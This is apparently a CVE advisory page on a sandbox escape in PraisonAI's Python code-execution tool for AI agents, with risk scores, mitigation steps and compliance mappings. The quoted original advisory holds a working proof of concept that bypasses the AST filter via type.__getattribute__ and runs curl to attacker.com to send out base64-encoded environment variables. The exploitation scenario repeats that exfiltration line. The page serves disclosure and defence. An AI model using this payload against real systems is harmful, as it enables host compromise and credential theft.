CVE-2026-40158: PraisonAI AST sandbox bypass enables

CISO Take

PraisonAI's Python execution sandbox, intended to safely run untrusted agent code, can be completely circumvented using a Python type system trampoline — a technique that transforms a blocked attribute access into an unblocked method call, requiring nothing more than the ability to submit code to the agent. Any multi-tenant platform, CI/CD pipeline, or agentic deployment that allows users to submit Python code for execution is exposed to full host compromise, including exfiltration of environment variables, API keys, and arbitrary file contents with the privileges of the host process. A public proof-of-concept demonstrates end-to-end exploitation in under fifteen lines, and with 31 prior CVEs recorded against the same package, this is part of a discernible pattern of security debt in PraisonAI's codebase that warrants elevated scrutiny. Upgrade to praisonaiagents >= 4.5.128 immediately; where patching is not immediately possible, wrap execution workers in OS-level isolation — containers with no-new-privileges, seccomp profiles, or a dedicated low-privilege user — and rotate any credentials accessible to the process environment.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

High risk. CVSS 8.6 with Scope:Changed reflects the attacker's ability to pivot from the Python sandbox to the underlying host process, and Attack Complexity:Low confirms no special conditions, races, or leaked pointers are required — only the ability to submit Python code to the agent. The publicly available PoC dramatically lowers the exploitation bar to moderate skill level. Environments running PraisonAI in multi-tenant or shared contexts are at greatest risk, since a single tenant's crafted payload can reach host-level credentials and potentially pivot to adjacent infrastructure. Single-user local deployments have a narrowed attack surface but remain at risk from malicious tool inputs or notebook content.

How does the attack unfold?

Tool Invocation

Attacker submits crafted Python code to the PraisonAI agent via the normal code execution interface, triggering the _execute_code_direct function and its AST-based security filter.

AML.T0053

Sandbox Bypass

The payload uses type.__getattribute__ as a trampoline, passing blocked attribute names as string constants (ast.Constant nodes) that are never checked by the filter, which only inspects ast.Attribute nodes.

AML.T0105

Host Code Execution

Attacker traverses the Python class hierarchy to retrieve the os.system function from __globals__ and executes arbitrary shell commands with the full privileges of the host process.

AML.T0050

Credential Exfiltration

All environment variables including API keys, cloud IAM credentials, and database connection strings are base64-encoded and sent to an attacker-controlled server via a spawned curl process.

AML.T0037

Tool Invocation

Attacker submits crafted Python code to the PraisonAI agent via the normal code execution interface, triggering the _execute_code_direct function and its AST-based security filter.

AML.T0053

Sandbox Bypass

The payload uses type.__getattribute__ as a trampoline, passing blocked attribute names as string constants (ast.Constant nodes) that are never checked by the filter, which only inspects ast.Attribute nodes.

AML.T0105

Host Code Execution

Attacker traverses the Python class hierarchy to retrieve the os.system function from __globals__ and executes arbitrary shell commands with the full privileges of the host process.

AML.T0050

Credential Exfiltration

All environment variables including API keys, cloud IAM credentials, and database connection strings are base64-encoded and sent to an attacker-controlled server via a spawned curl process.

AML.T0037

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
PraisonAI	pip	< 4.5.128	`4.5.128`
1 dependents 83% patched ~0d to patch Full package profile →
PraisonAI Agents	pip	—	No patch
11 dependents 69% patched ~0d to patch Full package profile →

How severe is it?

CVSS 3.1

8.6 / 10

EPSS

0.2%

chance of exploitation in 30 days

Higher than 15% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Moderate

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Local

AC Low

PR None

UI Required

S Changed

C High

I High

A High

What should I do?

5 steps

Patch: Upgrade to praisonaiagents >= 4.5.128 immediately. Verify the patch extends AST filtering to cover string constants passed as arguments to type.__getattribute__ and similar dynamic dispatch methods — not just ast.Attribute nodes.
Containment (if immediate patch is not possible): Run PraisonAI agent workers in isolated containers with seccomp/AppArmor profiles, read-only filesystems, no-new-privileges flags, and no access to host network or sensitive credential mounts.
Secret rotation: Rotate any API keys, database credentials, or cloud tokens accessible to PraisonAI process environments, especially in shared or multi-tenant deployments where prior exploitation cannot be ruled out.
Detection: Alert on outbound network connections from PraisonAI worker processes to unexpected destinations; monitor for curl, wget, or shell spawns as child processes of the agent runtime; log all code submissions for forensic review.
Defense-in-depth: Evaluate replacing or augmenting the AST-based approach with a process-level sandbox (nsjail, gVisor, or a Wasm runtime) for any production system executing untrusted code, as AST filtering is structurally insufficient for this threat model.

What does CISA's SSVC say?

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Data Extraction Agent Framework AML.T0037 - Data from Local System AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0055 - Unsecured Credentials AML.T0105 - Escape to Host

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.6.1.2 - AI risk assessment A.8.5 - Information security for AI systems

NIST AI RMF

MANAGE 2.4 - Residual risks are managed

OWASP LLM Top 10

LLM07 - Insecure Plugin Design LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-40158?

PraisonAI's Python execution sandbox, intended to safely run untrusted agent code, can be completely circumvented using a Python type system trampoline — a technique that transforms a blocked attribute access into an unblocked method call, requiring nothing more than the ability to submit code to the agent. Any multi-tenant platform, CI/CD pipeline, or agentic deployment that allows users to submit Python code for execution is exposed to full host compromise, including exfiltration of environment variables, API keys, and arbitrary file contents with the privileges of the host process. A public proof-of-concept demonstrates end-to-end exploitation in under fifteen lines, and with 31 prior CVEs recorded against the same package, this is part of a discernible pattern of security debt in PraisonAI's codebase that warrants elevated scrutiny. Upgrade to praisonaiagents >= 4.5.128 immediately; where patching is not immediately possible, wrap execution workers in OS-level isolation — containers with no-new-privileges, seccomp profiles, or a dedicated low-privilege user — and rotate any credentials accessible to the process environment.

Is CVE-2026-40158 actively exploited?

No confirmed active exploitation of CVE-2026-40158 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-40158?

1. Patch: Upgrade to praisonaiagents >= 4.5.128 immediately. Verify the patch extends AST filtering to cover string constants passed as arguments to type.__getattribute__ and similar dynamic dispatch methods — not just ast.Attribute nodes. 2. Containment (if immediate patch is not possible): Run PraisonAI agent workers in isolated containers with seccomp/AppArmor profiles, read-only filesystems, no-new-privileges flags, and no access to host network or sensitive credential mounts. 3. Secret rotation: Rotate any API keys, database credentials, or cloud tokens accessible to PraisonAI process environments, especially in shared or multi-tenant deployments where prior exploitation cannot be ruled out. 4. Detection: Alert on outbound network connections from PraisonAI worker processes to unexpected destinations; monitor for curl, wget, or shell spawns as child processes of the agent runtime; log all code submissions for forensic review. 5. Defense-in-depth: Evaluate replacing or augmenting the AST-based approach with a process-level sandbox (nsjail, gVisor, or a Wasm runtime) for any production system executing untrusted code, as AST filtering is structurally insufficient for this threat model.

What systems are affected by CVE-2026-40158?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, Multi-tenant AI platforms, CI/CD pipelines with AI code execution, LLM code execution environments, Automated agentic workflows.

What is the CVSS score for CVE-2026-40158?

CVE-2026-40158 has a CVSS v3.1 base score of 8.6 (HIGH). The EPSS exploitation probability is 0.24%.

What is the AI security impact?

Affected AI Architectures

Agent frameworksMulti-tenant AI platformsCI/CD pipelines with AI code executionLLM code execution environmentsAutomated agentic workflows

MITRE ATLAS Techniques

AML.T0037 Data from Local System

AML.T0050 Command and Scripting Interpreter

AML.T0053 AI Agent Tool Invocation

AML.T0055 Unsecured Credentials

AML.T0105 Escape to Host

Compliance Controls Affected

EU AI Act: Article 15, Article 9

ISO 42001: A.6.1.2, A.8.5

NIST AI RMF: MANAGE 2.4

OWASP LLM Top 10: LLM07, LLM08

What are the technical details?

Original Advisory

PraisonAI's AST-based Python sandbox can be bypassed using `type.__getattribute__` trampoline, allowing arbitrary code execution when running untrusted agent code. ## Description The `_execute_code_direct` function in `praisonaiagents/tools/python_tools.py` uses AST filtering to block dangerous Python attributes like `__subclasses__`, `__globals__`, and `__bases__`. However, the filter only checks `ast.Attribute` nodes, allowing bypass via: The sandbox relies on AST-based filtering of attribute access but fails to account for dynamic attribute resolution via built-in methods such as type.__getattribute__, resulting in incomplete enforcement of security restrictions. ```python type.__getattribute__(obj, '__subclasses__') # Bypasses filter ``` The string `'__subclasses__'` is an `ast.Constant`, not an `ast.Attribute`, so it is never checked against the blocked list. ## Proof of Concept ```python # This code bypasses the sandbox and achieves RCE t = type int_cls = t(1) # Bypass blocked __bases__ via type.__getattribute__ bases = t.__getattribute__(int_cls, '__bases__') obj_cls = bases[0] # Bypass blocked __subclasses__ subclasses_fn = t.__getattribute__(obj_cls, '__subclasses__') all_subclasses = subclasses_fn() # Find _wrap_close class for c in all_subclasses: if t.__getattribute__(c, '__name__') == '_wrap_close': # Get __init__.__globals__ via bypass init = t.__getattribute__(c, '__init__') glb = type(init).__getattribute__(init, '__globals__') # Get system function and execute system = glb['system'] system('curl https://attacker.com/steal --data "$(env | base64)"') ``` --- ## Impact This vulnerability allows attackers to escape the intended Python sandbox and execute arbitrary code with the privileges of the host process. An attacker can: * Access sensitive data such as environment variables, API keys, and local files * Execute arbitrary system commands * Modify or delete files on the system In environments that execute untrusted code (e.g., multi-tenant agent platforms, CI/CD pipelines, or shared systems), this can lead to full system compromise, data exfiltration, and potential lateral movement within the infrastructure. --- ## Affected Code ```python # praisonaiagents/tools/python_tools.py (approximate) def _execute_code_direct(code, ...): tree = ast.parse(code) for node in ast.walk(tree): # Only checks ast.Attribute nodes if isinstance(node, ast.Attribute) and node.attr in blocked_attrs: raise SecurityError(...) # Bypass: string arguments are not checked exec(compiled, safe_globals) ``` **Reporter:** Lakshmikanthan K (letchupkt)

Exploitation Scenario

An attacker targeting a SaaS platform built on PraisonAI submits a seemingly functional data-processing script as part of normal platform usage. The script uses type.__getattribute__ to traverse the Python class hierarchy — bypassing the AST filter's blocked-attribute list, because the dangerous attribute names are passed as string constants rather than attribute nodes — to reach _wrap_close.__init__.__globals__, which contains a live reference to the os.system function. The attacker calls system('curl https://attacker.com/exfil --data "$(env | base64)"'), exfiltrating all environment variables including cloud provider credentials, database connection strings, and third-party API keys in a single HTTP request. With those credentials, the attacker moves laterally to the cloud control plane or adjacent databases, escalating from a single code submission to a full infrastructure breach affecting every tenant on the platform.

Weaknesses (CWE)

CWE-693 Protection Mechanism Failure Primary CWE-94 Improper Control of Generation of Code ('Code Injection') Primary

CWE-693 — Protection Mechanism Failure: The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.

Source: MITRE CWE corpus.